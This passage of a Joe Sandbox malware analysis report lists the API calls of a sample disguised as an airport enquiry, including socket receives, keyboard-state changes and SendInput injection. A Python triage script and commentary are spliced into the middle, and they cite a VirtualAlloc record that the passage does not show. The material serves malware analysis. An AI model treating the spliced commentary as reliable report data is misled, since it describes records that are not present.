              • Part of subcall function 00CDDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00CDDAC5
            • VariantInit.OLEAUT32(?), ref: 00CF83EE
            • VariantClear.OLEAUT32(?), ref: 00CF86BF
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
             • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
            • String ID:
            • API String ID: 780911581-0
            • Opcode ID: e0a98e78348aa143afa78a5e92c11e2c1ba7ffeb12016554123be63d594cdff4
            • Instruction ID: db5ebfd291888019eae354b884f025b2a9f3277d43f9df99e124f5bbc49dc976
            • Opcode Fuzzy Hash: e0a98e78348aa143afa78a5e92c11e2c1ba7ffeb12016554123be63d594cdff4
            • Instruction Fuzzy Hash: E3A135752047059FDB50EF15C885B2AB7E4FF88318F188449FA9A9B3A1CB30ED05DB56
            APIs
            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00D12C7C,?), ref: 00CD7C32
            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00D12C7C,?), ref: 00CD7C4A
            • CLSIDFromProgID.OLE32(?,?,00000000,00D0FB80,000000FF,?,00000000,00000800,00000000,?,00D12C7C,?), ref: 00CD7C6F
            • _memcmp.LIBCMT ref: 00CD7C90
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
             • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FromProg$FreeTask_memcmp
            • String ID:
            • API String ID: 314563124-0
            • Opcode ID: 0e28387f41b7449ca286c0359b4417542fd22c86b2b6155f1bfdda65ee918486
            • Instruction ID: d9f9466c21dd879d3c50424f65b85d25da57a55e51b959ae35a8455c0a1679d6
            • Opcode Fuzzy Hash: 0e28387f41b7449ca286c0359b4417542fd22c86b2b6155f1bfdda65ee918486
            • Instruction Fuzzy Hash: C8811C71A00109EFCB04DF94C984EEEB7B9FF89315F204199F516AB250EB71AE46CB60
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
             • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Variant$AllocClearCopyInitString
            • String ID:
            • API String ID: 2808897238-0
            • Opcode ID: 5a6ea6c0e112d9f14dca4c396ba77c5e5c4337300bf9c9622775652e08aa5ccd
            • Instruction ID: 0474eac404dd5307cfc94486a9775beca887d7f8f8eddbc67de18a55fd9d8838
            • Opcode Fuzzy Hash: 5a6ea6c0e112d9f14dca4c396ba77c5e5c4337300bf9c9622775652e08aa5ccd
            • Instruction Fuzzy Hash: 4451BA306087019ADB34AF66D895B3EF3E5AF48310F24891FEA56CB7D1EB709840EB55
            APIs
            • GetWindowRect.USER32(?,?), ref: 00D09AD2
            • ScreenToClient.USER32(00000002,00000002), ref: 00D09B05
            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00D09B72
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
             • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$ClientMoveRectScreen
            • String ID:
            • API String ID: 3880355969-0
            • Opcode ID: c0cdb5ef50bc463e5fdebe90902fe785b3f15b60ee410dc7ccf587fa56bf2c87
            • Instruction ID: de0cb2a8c31c191f750e2012f94af118362ddc9a7cc09ca2e7f8dedb1148ee84
            • Opcode Fuzzy Hash: c0cdb5ef50bc463e5fdebe90902fe785b3f15b60ee410dc7ccf587fa56bf2c87
            • Instruction Fuzzy Hash: FA511D34A00209EFCF20DF68D891AAEBBB5FB55324F148159F8599B2D1D731AD81CB61
            APIs
             • socket.WSOCK32(00000002(AF_INET),00000002(SOCK_DGRAM),00000011(IPPROTO_UDP)), ref: 00CF6CE4
            • WSAGetLastError.WSOCK32(00000000), ref: 00CF6CF4
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
             • #21(setsockopt).WSOCK32(?,0000FFFF(SOL_SOCKET),00000020(SO_BROADCAST),00000002,00000004), ref: 00CF6D58
            • WSAGetLastError.WSOCK32(00000000), ref: 00CF6D64
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
             • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorLast$__itow__swprintfsocket
            • String ID:
            • API String ID: 2214342067-0
            • Opcode ID: 8b3bb92c2eb668578e40cd4f9bb11c3b0e4ee28c11e7a9a06ea5255942a55fc3
            • Instruction ID: d094884809237fe9a9ae42ac81d0bb94fcd9d062026b64a0be9a3a8ee6c4d959
            • Opcode Fuzzy Hash: 8b3bb92c2eb668578e40cd4f9bb11c3b0e4ee28c11e7a9a06ea5255942a55fc3
            • Instruction Fuzzy Hash: 7641A074740200AFEB20BF24DC86F7A77A5DB44B18F548018FA599B3D2DB759D009B96
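The per-function records in this report are uniform enough to parse mechanically, which is how a triager finds the few that matter among hundreds of AutoIt runtime routines: the RWX VirtualAlloc at ref 00CFE615 above, or the socket/setsockopt pair at 00CF6CE4 and 00CF6D58 where the report can only print the ordinal "#21" because the import is by ordinal. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample or from FormBook: it splits report text into records, resolves a few WSOCK32 ordinals from the standard Winsock export layout (partial table, by assumption only the entries listed), decodes the VirtualAlloc flags, and applies some flagging heuristics of my own. The sample text embedded in it is constructed in the report's layout, not copied report output.

```python
"""Parse Joe Sandbox per-function "APIs" records and flag call patterns worth triage."""
import re
from dataclasses import dataclass, field

# Partial table of WSOCK32/WS2_32 export ordinals (standard Winsock layout), so that
# calls the report can only show as "#NN.WSOCK32" (imported by ordinal) get a name.
WSOCK32_ORDINALS = {16: "recv", 17: "recvfrom", 19: "send", 20: "sendto",
                    21: "setsockopt", 23: "socket"}

# VirtualAlloc flAllocationType bits and flProtect values (winnt.h).
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# One "• name.MODULE(args), ref: ADDR" line; sub-call lines carry a prefix.
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[#\w:]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall: bool


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    api_string_id: str = ""


def _parse_arg(tok):
    """Return an int for an 8-digit hex literal (annotation in parens allowed), else the raw token."""
    tok = tok.strip()
    m = re.fullmatch(r"([0-9A-Fa-f]{8})(?:\(.*\))?", tok)
    return int(m.group(1), 16) if m else tok


def parse_records(text):
    """Split report text into FunctionRecords, one per "APIs" heading."""
    records, cur = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            name, mod = m.group("name"), m.group("mod")
            if name.startswith("#") and mod.upper() in ("WSOCK32", "WS2_32"):
                name = WSOCK32_ORDINALS.get(int(name[1:]), name)
            raw = m.group("args")
            args = [_parse_arg(a) for a in raw.split(",")] if raw else []
            cur.calls.append(ApiCall(name, mod, args, m.group("ref"), bool(m.group("sub"))))
        elif stripped.startswith("• API String ID:"):
            cur.api_string_id = stripped.split(":", 1)[1].strip()
    return records


def describe_alloc(args):
    """Decode VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect) arguments."""
    size, alloc, prot = args[1], args[2], args[3]
    names = [n for bit, n in MEM_FLAGS.items() if alloc & bit]
    return f"size=0x{size:x} type={'|'.join(names)} protect={PAGE_PROT.get(prot, hex(prot))}"


def flag_record(rec):
    """Heuristic flags for one function: RWX memory, UDP broadcast socket, synthetic input."""
    flags = set()
    for c in rec.calls:
        if c.name == "VirtualAlloc" and len(c.args) >= 4 and c.args[3] == 0x40:
            flags.add("rwx_alloc")
        if c.name == "socket" and c.args[:3] == [2, 2, 0x11]:        # AF_INET, SOCK_DGRAM, IPPROTO_UDP
            flags.add("udp_socket")
        if c.name == "setsockopt" and c.args[1:3] == [0xFFFF, 0x20]:  # SOL_SOCKET, SO_BROADCAST
            flags.add("so_broadcast")
        if c.name in ("SendInput", "SetKeyboardState"):
            flags.add("input_injection")
    return flags


# Constructed sample: three records written in the report's layout (not report output itself).
SAMPLE = """\
APIs
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00CFE615
• _memmove.LIBCMT ref: 00CFE628
Similarity
• API String ID: 3659485706-0
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00CF6CE4
• WSAGetLastError.WSOCK32(00000000), ref: 00CF6CF4
  • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00CF6D58
Similarity
• API String ID: 2214342067-0
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 00CD8669
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00CE110B
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print([c.name for c in rec.calls], sorted(flag_record(rec)))
```

Feed it the text of a whole report section and sort records by their flag set; the Instruction Fuzzy Hash lines can be carried alongside to recognise the same AutoIt runtime routine across samples, so that only records with unfamiliar hashes and interesting flags need a manual look.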
            APIs
             • #16(recv).WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00D0F910), ref: 00CF67BA
            • _strlen.LIBCMT ref: 00CF67EC
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
             • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _strlen
            • String ID:
            • API String ID: 4218353326-0
            • Opcode ID: 5ff397f53450293fea79c9780609cdb95f0a623503caa2ad1fc1d946890faee4
            • Instruction ID: e835e07875a1300fcc86350036e0d5763df37b023980d711b32da311c1e2b2de
            • Opcode Fuzzy Hash: 5ff397f53450293fea79c9780609cdb95f0a623503caa2ad1fc1d946890faee4
            • Instruction Fuzzy Hash: 6641A231A00108ABCB14FBA4DCC5FBEB3A9EF48354F148169FA1A972D2DB30AD04E755
            APIs
            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00CEBB09
            • GetLastError.KERNEL32(?,00000000), ref: 00CEBB2F
            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00CEBB54
            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00CEBB80
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
             • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CreateHardLink$DeleteErrorFileLast
            • String ID:
            • API String ID: 3321077145-0
            • Opcode ID: ade1a41c191bf2462d8cba729630a557a21987bb53c965dfb224d4cf0bfd3c99
            • Instruction ID: d6b8323fea6903267a5d1f92521849563b3f909409d585f7271f160052430b1f
            • Opcode Fuzzy Hash: ade1a41c191bf2462d8cba729630a557a21987bb53c965dfb224d4cf0bfd3c99
            • Instruction Fuzzy Hash: E6412939200650DFCF20EF15C584A6EBBE1EF49314B198498EC4A9B762CB34FD01EB95
            APIs
            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00D08B4D
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
             • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: InvalidateRect
            • String ID:
            • API String ID: 634782764-0
            • Opcode ID: 251f69454cf58469b6a1fd094727faa4a76cd217d63ffbc20c08ab49f34b87c8
            • Instruction ID: deb069900608c49491e811fa3144ce9333ec87a3e398d5d18079e081ef689c07
            • Opcode Fuzzy Hash: 251f69454cf58469b6a1fd094727faa4a76cd217d63ffbc20c08ab49f34b87c8
            • Instruction Fuzzy Hash: 5D3190B4600304BFEB209F18CC85BA93BA4EB06320F684516FAD9D67E1DE31E940A775
            APIs
            • ClientToScreen.USER32(?,?), ref: 00D0AE1A
            • GetWindowRect.USER32(?,?), ref: 00D0AE90
            • PtInRect.USER32(?,?,00D0C304), ref: 00D0AEA0
            • MessageBeep.USER32(00000000), ref: 00D0AF11
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
             • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Rect$BeepClientMessageScreenWindow
            • String ID:
            • API String ID: 1352109105-0
            • Opcode ID: 1ecc10ec8ba7073a52c4be60371b38ca98f8f40ec726df0c27b2f09258e5e410
            • Instruction ID: 84184794edffc126435336447277235aaee1851cd92fa1f0c1c5af73f6925533
            • Opcode Fuzzy Hash: 1ecc10ec8ba7073a52c4be60371b38ca98f8f40ec726df0c27b2f09258e5e410
            • Instruction Fuzzy Hash: 9B411874A003199FCB11DF58C884BA97BF5FB4A350F2881A9F819DB391D731E941DB62
            APIs
            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00CE1037
            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00CE1053
             • PostMessageW.USER32(00000000,00000102(WM_CHAR),00000001,00000001), ref: 00CE10B9
            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00CE110B
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
             • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: KeyboardState$InputMessagePostSend
            • String ID:
            • API String ID: 432972143-0
            • Opcode ID: 2d29b6232bb73c2a44ec6c67a2f0607b42b9d6b752d20621897f820ba1ffc6df
            • Instruction ID: 23d2319de2e1cd99a3dbd9c11e8319ecfe12dcdbd689afae965936754a1460bb
            • Opcode Fuzzy Hash: 2d29b6232bb73c2a44ec6c67a2f0607b42b9d6b752d20621897f820ba1ffc6df
            • Instruction Fuzzy Hash: 98314D30E446C8AEFF308B678C05BFDBBA9AB45310F1C421AE9A5525D1C3758AE49761
            APIs
            • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00CE1176
            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00CE1192
             • PostMessageW.USER32(00000000,00000101(WM_KEYUP),00000000), ref: 00CE11F1
            • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00CE1243
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
             • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: KeyboardState$InputMessagePostSend
            • String ID:
            • API String ID: 432972143-0
            • Opcode ID: 2cb56b0c760142bffdf210aebd398347d42c037329cce31da22aa22288b5a98d
            • Instruction ID: ea62e03e9cc5561257b6dd30c3d06fc1b5ad002b10335c206101fb1baeeaca0f
            • Opcode Fuzzy Hash: 2cb56b0c760142bffdf210aebd398347d42c037329cce31da22aa22288b5a98d
            • Instruction Fuzzy Hash: 61312B30A407885AEF348B67CC097FE7BAAAB49310F1C431AEAA5925D1C3748AA59751
            APIs
            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00CB644B
            • __isleadbyte_l.LIBCMT ref: 00CB6479
            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00CB64A7
            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00CB64DD
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
             • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
            • String ID:
            • API String ID: 3058430110-0
            • Opcode ID: ede988f587fa315f6aea9c3dfeade09fe1e8fd8a504ecb4dc48e2587fd9fd999
            • Instruction ID: bd675139bc2703b536f71edae246c46808b7825dde7d0c8d69148cd42b533629
            • Opcode Fuzzy Hash: ede988f587fa315f6aea9c3dfeade09fe1e8fd8a504ecb4dc48e2587fd9fd999
            • Instruction Fuzzy Hash: 3F31DE31600646AFDB22CF75C844BEB7BA9FF41310F154429F868871A0EB39D951DF90
            APIs
            • GetForegroundWindow.USER32 ref: 00D05189
              • Part of subcall function 00CE387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00CE3897
              • Part of subcall function 00CE387D: GetCurrentThreadId.KERNEL32 ref: 00CE389E
              • Part of subcall function 00CE387D: AttachThreadInput.USER32(00000000,?,00CE52A7), ref: 00CE38A5
            • GetCaretPos.USER32(?), ref: 00D0519A
            • ClientToScreen.USER32(00000000,?), ref: 00D051D5
            • GetForegroundWindow.USER32 ref: 00D051DB
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
             • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
            • String ID:
            • API String ID: 2759813231-0
            • Opcode ID: e6f10d7a48ef714d155690a43f4d8f463c4a0aeb9bed8fcfb42f963f3912f302
            • Instruction ID: 674885def440321ec3ee8a76fcb7eadf2ef47638de2a69b843ca5d085614fe7c
            • Opcode Fuzzy Hash: e6f10d7a48ef714d155690a43f4d8f463c4a0aeb9bed8fcfb42f963f3912f302
            • Instruction Fuzzy Hash: 4B314F71D00208AFCB10EFA5C885AEFB7F9EF88304F14406AE406E7241DA759E00DBA1
            APIs
              • Part of subcall function 00C82612: GetWindowLongW.USER32(?,000000EB), ref: 00C82623
            • GetCursorPos.USER32(?), ref: 00D0C7C2
            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00CBBBFB,?,?,?,?,?), ref: 00D0C7D7
            • GetCursorPos.USER32(?), ref: 00D0C824
            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00CBBBFB,?,?,?), ref: 00D0C85E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
             • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Cursor$LongMenuPopupProcTrackWindow
            • String ID:
            • API String ID: 2864067406-0
            • Opcode ID: 2044ac1acbdd8398ddb834073957dbd70f85f825d48f54d3965bfe06ab7abb36
            • Instruction ID: 3eba1eadf21f764dc7a8b0a646b4c76bc7a814a67bcca3533a0398d949c49f30
            • Opcode Fuzzy Hash: 2044ac1acbdd8398ddb834073957dbd70f85f825d48f54d3965bfe06ab7abb36
            • Instruction Fuzzy Hash: F2318235600118AFCB25CF58CC98FEA7BBAEB4A710F148169F9098B2A1D7319D50DF74
            APIs
            • __setmode.LIBCMT ref: 00CA0BF2
              • Part of subcall function 00C85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CE7B20,?,?,00000000), ref: 00C85B8C
              • Part of subcall function 00C85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CE7B20,?,?,00000000,?,?), ref: 00C85BB0
            • _fprintf.LIBCMT ref: 00CA0C29
            • OutputDebugStringW.KERNEL32(?), ref: 00CD6331
              • Part of subcall function 00CA4CDA: _flsall.LIBCMT ref: 00CA4CF3
            • __setmode.LIBCMT ref: 00CA0C5E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
             • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
            • String ID:
            • API String ID: 521402451-0
            • Opcode ID: ed5a6a5b36b751d3efd48495625204759c756c6085af6bdda838ac01052031be
